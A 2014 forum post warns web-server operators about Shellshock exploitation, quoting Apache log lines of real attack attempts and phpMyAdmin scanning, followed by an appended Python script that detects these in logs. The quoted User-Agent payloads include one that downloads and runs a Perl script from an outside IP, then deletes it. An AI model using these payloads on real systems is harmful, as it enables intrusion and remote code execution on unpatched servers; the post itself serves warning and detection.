09-30-2014
Hi Guys,
Just to let you know, if you are running any internet-facing servers with the bash (Shellshock) vulnerability still evident, you are risking a major intrusion. I am now seeing a spike in the activity, complexity and frequency of the attempts on my web servers.
Here is a sample of what I'm seeing.
Code :
54.251.83.67 - - [29/Sep/2014:01:36:14 +0100] "GET / HTTP/1.1" 200 2455 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
173.45.100.18 - - [29/Sep/2014:01:44:17 +0100] "GET /cgi-bin/ HTTP/1.1" 403 290 "-" "-"
173.45.100.18 - - [29/Sep/2014:01:44:18 +0100] "GET /cgi-bin/hi HTTP/1.0" 404 288 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
So if you're still unpatched - best get to it. The more advanced guys will be along very soon now.
There is still the script kiddy stuff as well, typically stuff like this.
Code :
210.51.47.229 - - [29/Sep/2014:11:29:43 +0100] "GET /muieblackcat HTTP/1.1" 404 290 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:44 +0100] "GET //scripts/setup.php HTTP/1.1" 404 295 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:45 +0100] "GET //admin/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:45 +0100] "GET //admin/pma/scripts/setup.php HTTP/1.1" 404 305 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:46 +0100] "GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:47 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 298 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:47 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:48 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:49 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:49 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:50 +0100] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:51 +0100] "GET //phpadmin/scripts/setup.php HTTP/1.1" 404 304 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:51 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:52 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:53 +0100] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:54 +0100] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:54 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:55 +0100] "GET //web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 310 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:56 +0100] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:56 +0100] "GET //web/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:57 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:58 +0100] "GET //websql/scripts/setup.php HTTP/1.1" 404 302 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:58 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:59 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:00 +0100] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:00 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:01 +0100] "GET //phpMyAdmin-2.5.5/index.php HTTP/1.1" 404 304 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:02 +0100] "GET //phpMyAdmin-2.5.5-pl1/index.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:02 +0100] "GET /muieblackcat HTTP/1.1" 404 290 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:03 +0100] "GET //scripts/setup.php HTTP/1.1" 404 295 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:03 +0100] "GET //admin/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:04 +0100] "GET //admin/pma/scripts/setup.php HTTP/1.1" 404 305 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:05 +0100] "GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:05 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 298 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:06 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:07 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:07 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:08 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:09 +0100] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:10 +0100] "GET //phpadmin/scripts/setup.php HTTP/1.1" 404 304 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:10 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:11 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:12 +0100] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:12 +0100] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:13 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:14 +0100] "GET //web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 310 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:14 +0100] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:15 +0100] "GET //web/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:16 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:16 +0100] "GET //websql/scripts/setup.php HTTP/1.1" 404 302 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:17 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:18 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:18 +0100] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:19 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:20 +0100] "GET //phpMyAdmin-2.5.5/index.php HTTP/1.1" 404 304 "-" "-"
But even that will improve, so better safe than sorry.
Regards
Dave
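As an added illustration (not part of Dave's post), the following Python triage script parses Apache combined-log lines like the ones quoted above, flags the Shellshock function-definition trigger in any quoted field (the post shows it in User-Agent only, but CGI exports the request line and Referer the same way), and counts the setup.php probing per source address. The embedded log lines are constructed from the post's own excerpts with the payloads trimmed, and the probe threshold is an arbitrary choice.

```python
import re
from collections import Counter

# Constructed sample modelled on the post's Apache combined-log excerpts.
SAMPLE_LOG = r'''54.251.83.67 - - [29/Sep/2014:01:36:14 +0100] "GET / HTTP/1.1" 200 2455 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
173.45.100.18 - - [29/Sep/2014:01:44:18 +0100] "GET /cgi-bin/hi HTTP/1.0" 404 288 "-" "() { :;}; /bin/bash -c \"cd /tmp\""
210.51.47.229 - - [29/Sep/2014:11:29:44 +0100] "GET //scripts/setup.php HTTP/1.1" 404 295 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:45 +0100] "GET //admin/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:54 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
192.0.2.10 - - [29/Sep/2014:12:00:00 +0100] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux)"
'''

# Combined log format; quoted fields may contain Apache-escaped \" sequences.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# CVE-2014-6271 trigger: a function definition "() { ... };" placed where a
# CGI-exported header value begins, followed by trailing commands.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')
# Hypothetical threshold for the phpMyAdmin setup.php probing seen in the post.
SETUP_PROBE, PROBE_THRESHOLD = "scripts/setup.php", 3

def parse_line(line):
    """Return the combined-log fields as a dict, or None for a malformed line."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def analyse(log_text, probe_threshold=PROBE_THRESHOLD):
    """Return (hits, scanner_ips): hits are (ip, field, value) for every quoted
    field carrying the trigger; scanner_ips sent >= threshold setup.php 404s."""
    hits, probes = [], Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: in production, count these as well
        for field in ("request", "referer", "ua"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append((rec["ip"], field, rec[field]))
        if rec["status"] == "404" and SETUP_PROBE in rec["request"]:
            probes[rec["ip"]] += 1
    scanners = sorted(ip for ip, n in probes.items() if n >= probe_threshold)
    return hits, scanners

if __name__ == "__main__":
    found, scanners = analyse(SAMPLE_LOG)
    for ip, field, value in found:
        print(f"Shellshock attempt from {ip} via {field}: {value}")
    print("setup.php scanners:", ", ".join(scanners))
```

Run it against a real access log with `analyse(open("/var/log/apache2/access.log").read())`; any hit means the request reached the server and the host's bash patch level should be verified immediately.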